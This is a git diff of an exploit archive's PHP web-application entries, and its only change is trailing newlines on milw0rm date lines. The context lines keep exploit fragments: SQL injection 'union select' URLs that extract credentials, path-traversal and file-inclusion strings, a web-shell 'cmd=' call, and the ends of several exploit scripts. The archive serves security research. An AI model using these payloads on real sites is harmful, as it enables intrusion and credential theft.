--- a/platforms/php/webapps/5450.txt +++ b/platforms/php/webapps/5450.txt @@ -22,4 +22,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-04-15] +# milw0rm.com [2008-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/5452.txt b/platforms/php/webapps/5452.txt index cef1a681c..3e27d9a8f 100755 --- a/platforms/php/webapps/5452.txt +++ b/platforms/php/webapps/5452.txt @@ -111,4 +111,4 @@ ###################################################################################### -# milw0rm.com [2008-04-15] +# milw0rm.com [2008-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/5454.txt b/platforms/php/webapps/5454.txt index 53f80d48e..af58dd3e8 100755 --- a/platforms/php/webapps/5454.txt +++ b/platforms/php/webapps/5454.txt @@ -12,4 +12,4 @@ http://www.DZ-Secure.com --------------------- ############################################### -# milw0rm.com [2008-04-15] +# milw0rm.com [2008-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/5457.txt b/platforms/php/webapps/5457.txt index ae298df1e..4b049598a 100755 --- a/platforms/php/webapps/5457.txt +++ b/platforms/php/webapps/5457.txt @@ -13,4 +13,4 @@ http://www.DZ-Secure.com --------------------- ############################################### -# milw0rm.com [2008-04-16] +# milw0rm.com [2008-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/5459.txt b/platforms/php/webapps/5459.txt index 7e0a17ebb..2e7acde8b 100755 --- a/platforms/php/webapps/5459.txt +++ b/platforms/php/webapps/5459.txt @@ -23,4 +23,4 @@ # ################################################################ -# milw0rm.com [2008-04-17] +# milw0rm.com [2008-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/5463.txt b/platforms/php/webapps/5463.txt index ddb5cc061..43d8ab958 100755 --- a/platforms/php/webapps/5463.txt +++ b/platforms/php/webapps/5463.txt @@ -30,4 +30,4 @@ RoMaNTiC TeaM :"SaudiXKafoOo , Gn6.AlSfeeNh , Kill EyE , Ghost Of The Sky , ABO # For Contact : MajnOoNxHaCkEr@wInDoWsLiVe.CoM -# milw0rm.com [2008-04-18] +# milw0rm.com [2008-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/5464.txt b/platforms/php/webapps/5464.txt index 18e57c7da..a0538404e 100755 --- a/platforms/php/webapps/5464.txt +++ b/platforms/php/webapps/5464.txt @@ -14,4 +14,4 @@ note: if error says :table login does not exist the website is using a prefix fo Regards, The-0utl4w -# milw0rm.com [2008-04-18] +# milw0rm.com [2008-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/5465.txt b/platforms/php/webapps/5465.txt index 6c0343b85..3f640f5b0 100755 --- a/platforms/php/webapps/5465.txt +++ b/platforms/php/webapps/5465.txt @@ -36,4 +36,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ 2532|Gigs <= 1.2.2 Arbitrary Remote Database Backup/Download +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-18] +# milw0rm.com [2008-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/5466.pl b/platforms/php/webapps/5466.pl index 9a18bb19b..894557a43 100755 --- a/platforms/php/webapps/5466.pl +++ b/platforms/php/webapps/5466.pl @@ -52,4 +52,4 @@ if($result->is_success() && $result->content !~ /unable to change password/i && print "Exploit Failed! check domain is running OpenInvoice <= 0.9, Check UID isnt 1\n"; exit; -# milw0rm.com [2008-04-18] +# milw0rm.com [2008-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/5467.txt b/platforms/php/webapps/5467.txt index 349a3894e..0e11462bb 100755 --- a/platforms/php/webapps/5467.txt +++ b/platforms/php/webapps/5467.txt @@ -40,4 +40,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ PhShoutBox <= 1.5 (final) Insecure Cookie Handling (Arbitrary Authentication) +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-18] +# milw0rm.com [2008-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/5468.txt b/platforms/php/webapps/5468.txt index 59e365bd9..e25c1e97e 100755 --- a/platforms/php/webapps/5468.txt +++ b/platforms/php/webapps/5468.txt @@ -39,4 +39,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Simple Customer 1.2 SQL Injection Vulnerabilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-18] +# milw0rm.com [2008-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/5469.txt b/platforms/php/webapps/5469.txt index ba10f23f5..d193f0dd0 100755 --- a/platforms/php/webapps/5469.txt +++ b/platforms/php/webapps/5469.txt @@ -24,4 +24,4 @@ # ######################################################## -# milw0rm.com [2008-04-19] +# milw0rm.com [2008-04-19] \ No newline at end of file diff --git a/platforms/php/webapps/5470.py b/platforms/php/webapps/5470.py index 98f7fafd3..ff88832e9 100755 --- a/platforms/php/webapps/5470.py +++ b/platforms/php/webapps/5470.py @@ -156,4 +156,4 @@ while j <= 32: print "\n\n[+]All Done.\n-=Paradox Got This One=-" -# milw0rm.com [2008-04-19] +# milw0rm.com [2008-04-19] \ No newline at end of file diff --git a/platforms/php/webapps/5471.txt b/platforms/php/webapps/5471.txt index 4c1c2ef22..3e47222d8 100755 --- a/platforms/php/webapps/5471.txt +++ b/platforms/php/webapps/5471.txt @@ -22,4 +22,4 @@ $ Admin Login : /Site_Admin/ $ Greetz : Milw0rm.Com & All Peace Warriors -# milw0rm.com [2008-04-19] +# milw0rm.com [2008-04-19] \ No newline at end of file diff --git a/platforms/php/webapps/5473.pl b/platforms/php/webapps/5473.pl index c82bd4034..ce964b51f 100755 --- a/platforms/php/webapps/5473.pl +++ b/platforms/php/webapps/5473.pl @@ -40,4 +40,4 @@ http://www.xoops.org/modules/repository/singlefile.php?cid=43& #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-04-19] +# milw0rm.com [2008-04-19] \ No newline at end of file diff --git a/platforms/php/webapps/5474.txt b/platforms/php/webapps/5474.txt index fe798449f..3c2d227e4 100755 --- a/platforms/php/webapps/5474.txt +++ b/platforms/php/webapps/5474.txt @@ -16,4 +16,4 @@ http://localsite.com/path/include/common.inc.php?file=[Local File] ################################################# -# milw0rm.com [2008-04-19] +# milw0rm.com [2008-04-19] \ No newline at end of file diff --git a/platforms/php/webapps/5476.txt b/platforms/php/webapps/5476.txt index 59b27b4f7..4f6c8bc05 100755 --- a/platforms/php/webapps/5476.txt +++ b/platforms/php/webapps/5476.txt @@ -18,4 +18,4 @@ $Note .........: Erbabi ile vurulduysak sirtimizdan neyleyelim.Bir Yarali Kurt M $Note .........: Her Yanimiz it Tuzagi . . -# milw0rm.com [2008-04-20] +# milw0rm.com [2008-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/5477.txt b/platforms/php/webapps/5477.txt index 3131c0425..3ce56a059 100755 --- a/platforms/php/webapps/5477.txt +++ b/platforms/php/webapps/5477.txt @@ -16,4 +16,4 @@ $ Username Exp : www.x.com/script_path/ipn.php?i=localfile%00 $ Greetz : Milw0rm.Com & All Peace Warriors -# milw0rm.com [2008-04-20] +# milw0rm.com [2008-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/5478.txt b/platforms/php/webapps/5478.txt index 6b79e70c4..d7aae65f0 100755 --- a/platforms/php/webapps/5478.txt +++ b/platforms/php/webapps/5478.txt @@ -80,4 +80,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-04-20] +# milw0rm.com [2008-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/5480.txt b/platforms/php/webapps/5480.txt index 9bee317bc..8c78e5362 100755 --- a/platforms/php/webapps/5480.txt +++ b/platforms/php/webapps/5480.txt @@ -19,4 +19,4 @@ http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName : The_BekiR - fahn - ka0x - xarnux - Ruslan - Tevfik Cevik - Ferruh Mavituna - nettoxic - sersak : -# milw0rm.com [2008-04-21] +# milw0rm.com [2008-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/5481.txt b/platforms/php/webapps/5481.txt index c3011013d..5385b9253 100755 --- a/platforms/php/webapps/5481.txt +++ b/platforms/php/webapps/5481.txt @@ -57,4 +57,4 @@ Dersler BasladI Sanal Bitti :((( ###################CANAKKALE GECiLMEZ#################### -# milw0rm.com [2008-04-21] +# milw0rm.com [2008-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/5483.txt b/platforms/php/webapps/5483.txt index 94ce96833..5b895069f 100755 --- a/platforms/php/webapps/5483.txt +++ b/platforms/php/webapps/5483.txt @@ -30,4 +30,4 @@ # ############################################################################# -# milw0rm.com [2008-04-21] +# milw0rm.com [2008-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/5484.txt b/platforms/php/webapps/5484.txt index 37b567120..345e77c3e 100755 --- a/platforms/php/webapps/5484.txt +++ b/platforms/php/webapps/5484.txt @@ -27,4 +27,4 @@ [+] : Open the source page to see the 'password' ########################################### -# milw0rm.com [2008-04-22] +# milw0rm.com [2008-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/5485.pl b/platforms/php/webapps/5485.pl index 6270df9f3..9eb8267ac 100755 --- a/platforms/php/webapps/5485.pl +++ b/platforms/php/webapps/5485.pl @@ -39,4 +39,4 @@ print "\nExploit Successfull! Admin Details Are: ".$res; # Coded by t0pP8uZz -# milw0rm.com [2008-04-22] +# milw0rm.com [2008-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/5486.txt b/platforms/php/webapps/5486.txt index 6bab7fbc0..99451d664 100755 --- a/platforms/php/webapps/5486.txt +++ b/platforms/php/webapps/5486.txt @@ -20,4 +20,4 @@ function ss_load ($id, $plain=FALSE) { ==> Visit us @ forum.antichat.ru -# milw0rm.com [2008-04-22] +# milw0rm.com [2008-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/5487.txt b/platforms/php/webapps/5487.txt index 552e16f63..9fc4928a6 100755 --- a/platforms/php/webapps/5487.txt +++ b/platforms/php/webapps/5487.txt @@ -20,4 +20,4 @@ http://cogites.com/e_reserv/e_reserv/index.php?ID_loc=-1%20union%20select%20vers visit: www.no-back.org & www.tryag.com ========================================================= -# milw0rm.com [2008-04-23] +# milw0rm.com [2008-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/5488.txt b/platforms/php/webapps/5488.txt index bc27bda0c..4daa2673a 100755 --- a/platforms/php/webapps/5488.txt +++ b/platforms/php/webapps/5488.txt @@ -36,4 +36,4 @@ ########################################### -# milw0rm.com [2008-04-23] +# milw0rm.com [2008-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/5490.pl b/platforms/php/webapps/5490.pl index 8e0746ddc..9a5ca6cb4 100755 --- a/platforms/php/webapps/5490.pl +++ b/platforms/php/webapps/5490.pl @@ -377,4 +377,4 @@ sub start } -# milw0rm.com [2008-04-23] +# milw0rm.com [2008-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/5491.txt b/platforms/php/webapps/5491.txt index d0a5991bc..248410997 100755 --- a/platforms/php/webapps/5491.txt +++ b/platforms/php/webapps/5491.txt @@ -27,4 +27,4 @@ ######################################## -# milw0rm.com [2008-04-23] +# milw0rm.com [2008-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/5493.txt b/platforms/php/webapps/5493.txt index 6ab4e4997..81bba9b34 100755 --- a/platforms/php/webapps/5493.txt +++ b/platforms/php/webapps/5493.txt @@ -38,4 +38,4 @@ side note: 1.0 Component to create notepad files. (see about) -# milw0rm.com [2008-04-24] +# milw0rm.com [2008-04-24] \ No newline at end of file diff --git a/platforms/php/webapps/5494.txt b/platforms/php/webapps/5494.txt index 3d482700c..c80d4d576 100755 --- a/platforms/php/webapps/5494.txt +++ b/platforms/php/webapps/5494.txt @@ -79,4 +79,4 @@ # Encode in Hex loadfile()'s parameter if magic_quotes_gpc = On ---------------------------------------------------------------------------------- -# milw0rm.com [2008-04-25] +# milw0rm.com [2008-04-25] \ No newline at end of file diff --git a/platforms/php/webapps/5495.txt b/platforms/php/webapps/5495.txt index bc75085f1..4152c60b6 100755 --- a/platforms/php/webapps/5495.txt +++ b/platforms/php/webapps/5495.txt @@ -11,4 +11,4 @@ Moga byc rozne tabele np. pn_users, nuke_users itp. Homepage: http://devilteam.pl/ -# milw0rm.com [2008-04-25] +# milw0rm.com [2008-04-25] \ No newline at end of file diff --git a/platforms/php/webapps/5497.txt b/platforms/php/webapps/5497.txt index ef9b2a8ec..29a916a8a 100755 --- a/platforms/php/webapps/5497.txt +++ b/platforms/php/webapps/5497.txt @@ -32,4 +32,4 @@ | | \===============================================================================================================================================/ -# milw0rm.com [2008-04-25] +# milw0rm.com [2008-04-25] \ No newline at end of file diff --git a/platforms/php/webapps/5499.txt b/platforms/php/webapps/5499.txt index 0f222dd00..794df71dd 100755 --- a/platforms/php/webapps/5499.txt +++ b/platforms/php/webapps/5499.txt @@ -36,4 +36,4 @@ # Site : Http://IRCRASH.COM # ##################################TNX : GOD########################################## -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/5500.txt b/platforms/php/webapps/5500.txt index f946c1a86..ac3c66a0a 100755 --- a/platforms/php/webapps/5500.txt +++ b/platforms/php/webapps/5500.txt @@ -52,4 +52,4 @@ echo "\n"; Pozdrowienia dla calej ekipy DEVILTEAM.PL -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/5501.txt b/platforms/php/webapps/5501.txt index b6bbedfb6..e25495e3a 100755 --- a/platforms/php/webapps/5501.txt +++ b/platforms/php/webapps/5501.txt @@ -34,4 +34,4 @@ Tryag TeaM & All Members Of My Forum & Anyone Hate Me :) -==========================================[ ViVa Islam + YeMeN ]====================================- -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/5502.pl b/platforms/php/webapps/5502.pl index ae171d980..fdb5d948b 100755 --- a/platforms/php/webapps/5502.pl +++ b/platforms/php/webapps/5502.pl @@ -35,4 +35,4 @@ my $victim = $ARGV[0]; print "\n[-] exploit calismadi\n"; } -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/5504.txt b/platforms/php/webapps/5504.txt index f2c0fbf1c..1c8ec7af2 100755 --- a/platforms/php/webapps/5504.txt +++ b/platforms/php/webapps/5504.txt @@ -18,4 +18,4 @@ http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1 union visit: www.no-back.org & www.tryag.com ========================================================= -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/5505.txt b/platforms/php/webapps/5505.txt index 79c9c9f83..fb3c53d66 100755 --- a/platforms/php/webapps/5505.txt +++ b/platforms/php/webapps/5505.txt @@ -16,4 +16,4 @@ Bütün Türkiye'ye Ve Dünya'ya Selam oLsun aLtın Kemer Trabzonun ! http://coderx.org and http://scriptlife.org -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/5506.txt b/platforms/php/webapps/5506.txt index 7cee09172..02f7bc462 100755 --- a/platforms/php/webapps/5506.txt +++ b/platforms/php/webapps/5506.txt @@ -48,4 +48,4 @@ be substituted for password in the above statement. by: YOUCODE --- icode00@gmail.com -------------------------------------------------------- -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/5508.txt b/platforms/php/webapps/5508.txt index 074a4bc5b..fe2b78e74 100755 --- a/platforms/php/webapps/5508.txt +++ b/platforms/php/webapps/5508.txt @@ -13,4 +13,4 @@ jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),u dork:allinurl:"jokes.php?catagorie=" -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/5509.txt b/platforms/php/webapps/5509.txt index 7bd7f7ca1..a16cc7ea1 100755 --- a/platforms/php/webapps/5509.txt +++ b/platforms/php/webapps/5509.txt @@ -17,4 +17,4 @@ http://www.DZ-Secure.com --------------------- ############################################### -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/5510.txt b/platforms/php/webapps/5510.txt index 6298e1869..bc03d1fad 100755 --- a/platforms/php/webapps/5510.txt +++ b/platforms/php/webapps/5510.txt @@ -30,4 +30,4 @@ target.com/cm/phpinfo.php ================================================================================================================= -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/5512.pl b/platforms/php/webapps/5512.pl index b477f2437..52f09b129 100755 --- a/platforms/php/webapps/5512.pl +++ b/platforms/php/webapps/5512.pl @@ -334,4 +334,4 @@ sub start } } -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/5513.pl b/platforms/php/webapps/5513.pl index b316e6187..887c1db85 100755 --- a/platforms/php/webapps/5513.pl +++ b/platforms/php/webapps/5513.pl @@ -332,4 +332,4 @@ sub start } } -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/5514.pl b/platforms/php/webapps/5514.pl index fdf61048d..35b8eb9b9 100755 --- a/platforms/php/webapps/5514.pl +++ b/platforms/php/webapps/5514.pl @@ -32,4 +32,4 @@ while($log) print "Administrator hash: ".$result."\n"; print "REQUEST: ".$request; -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/5516.txt b/platforms/php/webapps/5516.txt index b500dd2f7..aab50b167 100755 --- a/platforms/php/webapps/5516.txt +++ b/platforms/php/webapps/5516.txt @@ -82,4 +82,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-04-28] +# milw0rm.com [2008-04-28] \ No newline at end of file diff --git a/platforms/php/webapps/5517.txt b/platforms/php/webapps/5517.txt index c144f5126..7a238a679 100755 --- a/platforms/php/webapps/5517.txt +++ b/platforms/php/webapps/5517.txt @@ -85,4 +85,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-04-28] +# milw0rm.com [2008-04-28] \ No newline at end of file diff --git a/platforms/php/webapps/5520.txt b/platforms/php/webapps/5520.txt index 9bd7aa802..a32e7f9cb 100755 --- a/platforms/php/webapps/5520.txt +++ b/platforms/php/webapps/5520.txt @@ -35,4 +35,4 @@ [<>] Greetz : F!resell , Mohamed el Arab , MrExE , H-T Team [ HouSSaMix + ToXiC350 ] , Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr , stR0ke -# milw0rm.com [2008-04-28] +# milw0rm.com [2008-04-28] \ No newline at end of file diff --git a/platforms/php/webapps/5521.txt b/platforms/php/webapps/5521.txt index 7065f525c..e2bcc7c4a 100755 --- a/platforms/php/webapps/5521.txt +++ b/platforms/php/webapps/5521.txt @@ -58,4 +58,4 @@ Web www.security-assessment.com Email info@security-assessment.com Phone +649 302 5093 -# milw0rm.com [2008-04-29] +# milw0rm.com [2008-04-29] \ No newline at end of file diff --git a/platforms/php/webapps/5522.txt b/platforms/php/webapps/5522.txt index fb1ffd113..c4fbdf48b 100755 --- a/platforms/php/webapps/5522.txt +++ b/platforms/php/webapps/5522.txt @@ -13,4 +13,4 @@ PoC: Deleting Config.php will casue situation when users won't be able to view index page normally. Only errors will be visible... -# milw0rm.com [2008-04-29] +# milw0rm.com [2008-04-29] \ No newline at end of file diff --git a/platforms/php/webapps/5523.txt b/platforms/php/webapps/5523.txt index aa970e8a7..cc9ca21a1 100755 --- a/platforms/php/webapps/5523.txt +++ b/platforms/php/webapps/5523.txt @@ -11,4 +11,4 @@ http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../conf 3- file disclosure /plugins/system-logger/print_logs.php?filename=../../config/config.php -# milw0rm.com [2008-04-30] +# milw0rm.com [2008-04-30] \ No newline at end of file diff --git a/platforms/php/webapps/5524.txt b/platforms/php/webapps/5524.txt index 820d579fb..193c2142b 100755 --- a/platforms/php/webapps/5524.txt +++ b/platforms/php/webapps/5524.txt @@ -29,4 +29,4 @@ Afte All this Click "Enter Message" Now Go :-> http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir # Thanx To TryagOxY -# milw0rm.com [2008-04-30] +# milw0rm.com [2008-04-30] \ No newline at end of file diff --git a/platforms/php/webapps/5525.txt b/platforms/php/webapps/5525.txt index ec75fbf4a..9f268825a 100755 --- a/platforms/php/webapps/5525.txt +++ b/platforms/php/webapps/5525.txt @@ -26,4 +26,4 @@ http://www.site.com/wapchat/src/eng.saveNewRoom.php?sysFileDir=[shell] http://www.site.com/wapchat/src/eng.searchMember.php?sysFileDir=[shell] http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell] -# milw0rm.com [2008-04-30] +# milw0rm.com [2008-04-30] \ No newline at end of file diff --git a/platforms/php/webapps/5526.txt b/platforms/php/webapps/5526.txt index ffa815a28..c95f00cca 100755 --- a/platforms/php/webapps/5526.txt +++ b/platforms/php/webapps/5526.txt @@ -34,4 +34,4 @@ Tryag TeaM & All Members Of My Forum & Anyone Hate Me :) -==========================================[ ViVa Islam + YeMeN ]====================================- -# milw0rm.com [2008-04-30] +# milw0rm.com [2008-04-30] \ No newline at end of file diff --git a/platforms/php/webapps/5527.pl b/platforms/php/webapps/5527.pl index 0ec316692..961dd4645 100755 --- a/platforms/php/webapps/5527.pl +++ b/platforms/php/webapps/5527.pl @@ -333,4 +333,4 @@ sub start } } -# milw0rm.com [2008-05-01] +# milw0rm.com [2008-05-01] \ No newline at end of file diff --git a/platforms/php/webapps/5528.txt b/platforms/php/webapps/5528.txt index ceed54e81..bf3077d9f 100755 --- a/platforms/php/webapps/5528.txt +++ b/platforms/php/webapps/5528.txt @@ -21,4 +21,4 @@ # Site : Http://IRCRASH.COM # ################################ TNX GOD ############################################ -# milw0rm.com [2008-05-01] +# milw0rm.com [2008-05-01] \ No newline at end of file diff --git a/platforms/php/webapps/5529.txt b/platforms/php/webapps/5529.txt index b9c7ffa29..5d6e4fc19 100755 --- a/platforms/php/webapps/5529.txt +++ b/platforms/php/webapps/5529.txt @@ -25,4 +25,4 @@ # Site : Http://IRCRASH.COM # ################################ TNX GOD ############################################ -# milw0rm.com [2008-05-01] +# milw0rm.com [2008-05-01] \ No newline at end of file diff --git a/platforms/php/webapps/5531.txt b/platforms/php/webapps/5531.txt index 598713d0d..63f556848 100755 --- a/platforms/php/webapps/5531.txt +++ b/platforms/php/webapps/5531.txt @@ -55,4 +55,4 @@ note: there is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same -# milw0rm.com [2008-05-02] +# milw0rm.com [2008-05-02] \ No newline at end of file diff --git a/platforms/php/webapps/5532.txt b/platforms/php/webapps/5532.txt index 65080c379..3f2e48151 100755 --- a/platforms/php/webapps/5532.txt +++ b/platforms/php/webapps/5532.txt @@ -39,4 +39,4 @@ # Devils Night Corporation - http://devilsnight.altervista.org # #===========================================================================================================================# -# milw0rm.com [2008-05-02] +# milw0rm.com [2008-05-02] \ No newline at end of file diff --git a/platforms/php/webapps/5533.txt b/platforms/php/webapps/5533.txt index 09132b868..cbdd03fcd 100755 --- a/platforms/php/webapps/5533.txt +++ b/platforms/php/webapps/5533.txt @@ -11,4 +11,4 @@ OR : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7-- ########################################### -# milw0rm.com [2008-05-03] +# milw0rm.com [2008-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/5535.txt b/platforms/php/webapps/5535.txt index b201bbc6a..721b45dc6 100755 --- a/platforms/php/webapps/5535.txt +++ b/platforms/php/webapps/5535.txt @@ -17,4 +17,4 @@ http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,ps --------------------- ############################################### -# milw0rm.com [2008-05-03] +# milw0rm.com [2008-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/5537.txt b/platforms/php/webapps/5537.txt index 9953e23b0..c908ad305 100755 --- a/platforms/php/webapps/5537.txt +++ b/platforms/php/webapps/5537.txt @@ -60,4 +60,4 @@ http://www.phpdirectorysource.com/directory/admin.php -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-03] +# milw0rm.com [2008-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/5538.txt b/platforms/php/webapps/5538.txt index bff4fd09b..5e94de36f 100755 --- a/platforms/php/webapps/5538.txt +++ b/platforms/php/webapps/5538.txt @@ -103,4 +103,4 @@ example: >">> -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-04] +# milw0rm.com [2008-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/5539.txt b/platforms/php/webapps/5539.txt index 6e73ae4f7..3075c3c1c 100755 --- a/platforms/php/webapps/5539.txt +++ b/platforms/php/webapps/5539.txt @@ -34,4 +34,4 @@ # ######################################################################## -# milw0rm.com [2008-05-04] +# milw0rm.com [2008-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/5540.pl b/platforms/php/webapps/5540.pl index f8565d6f3..749a917c8 100755 --- a/platforms/php/webapps/5540.pl +++ b/platforms/php/webapps/5540.pl @@ -36,4 +36,4 @@ my $victim = $ARGV[0]; print "\n[-] exploit failed\n"; } -# milw0rm.com [2008-05-04] +# milw0rm.com [2008-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/5541.txt b/platforms/php/webapps/5541.txt index 803974d83..eb40d41aa 100755 --- a/platforms/php/webapps/5541.txt +++ b/platforms/php/webapps/5541.txt @@ -86,4 +86,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5542.txt b/platforms/php/webapps/5542.txt index 332e5d95f..93932e028 100755 --- a/platforms/php/webapps/5542.txt +++ b/platforms/php/webapps/5542.txt @@ -84,4 +84,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5543.txt b/platforms/php/webapps/5543.txt index 54f3959ae..d3dbf26f8 100755 --- a/platforms/php/webapps/5543.txt +++ b/platforms/php/webapps/5543.txt @@ -86,4 +86,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5544.txt b/platforms/php/webapps/5544.txt index 3fc2f3006..50c79722f 100755 --- a/platforms/php/webapps/5544.txt +++ b/platforms/php/webapps/5544.txt @@ -89,4 +89,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5545.txt b/platforms/php/webapps/5545.txt index 70be0bf1a..1f279ee94 100755 --- a/platforms/php/webapps/5545.txt +++ b/platforms/php/webapps/5545.txt @@ -86,4 +86,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5546.txt b/platforms/php/webapps/5546.txt index 43a59781a..848401c92 100755 --- a/platforms/php/webapps/5546.txt +++ b/platforms/php/webapps/5546.txt @@ -85,4 +85,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5548.txt b/platforms/php/webapps/5548.txt index 7b525817e..344f403dc 100755 --- a/platforms/php/webapps/5548.txt +++ b/platforms/php/webapps/5548.txt @@ -33,4 +33,4 @@ Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr =============================================================== -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5549.txt b/platforms/php/webapps/5549.txt index af44eeaa4..0b88de2a4 100755 --- a/platforms/php/webapps/5549.txt +++ b/platforms/php/webapps/5549.txt @@ -50,4 +50,4 @@ young iranian h4ck3rz /* tnx 2: st0rke,aria-security.net,r00tshell.org,all h4ck3rz */ -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5550.php b/platforms/php/webapps/5550.php index f955bd355..51c0c62dc 100755 --- a/platforms/php/webapps/5550.php +++ b/platforms/php/webapps/5550.php @@ -251,4 +251,4 @@ while(1) ?> -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/5551.txt b/platforms/php/webapps/5551.txt index 9cd6a7c2c..0d2d33c2d 100755 --- a/platforms/php/webapps/5551.txt +++ b/platforms/php/webapps/5551.txt @@ -40,4 +40,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Pre Shopping Mall 1.1 SQL Injection Vulnerablity +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-06] +# milw0rm.com [2008-05-06] \ No newline at end of file diff --git a/platforms/php/webapps/5552.txt b/platforms/php/webapps/5552.txt index e47ec6be9..5872dc6a2 100755 --- a/platforms/php/webapps/5552.txt +++ b/platforms/php/webapps/5552.txt @@ -32,4 +32,4 @@ Vulnerability: http://localhost/localhost/phpeasydata-1.5.4/annuaire.php?annuair -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-06] +# milw0rm.com [2008-05-06] \ No newline at end of file diff --git a/platforms/php/webapps/5554.php 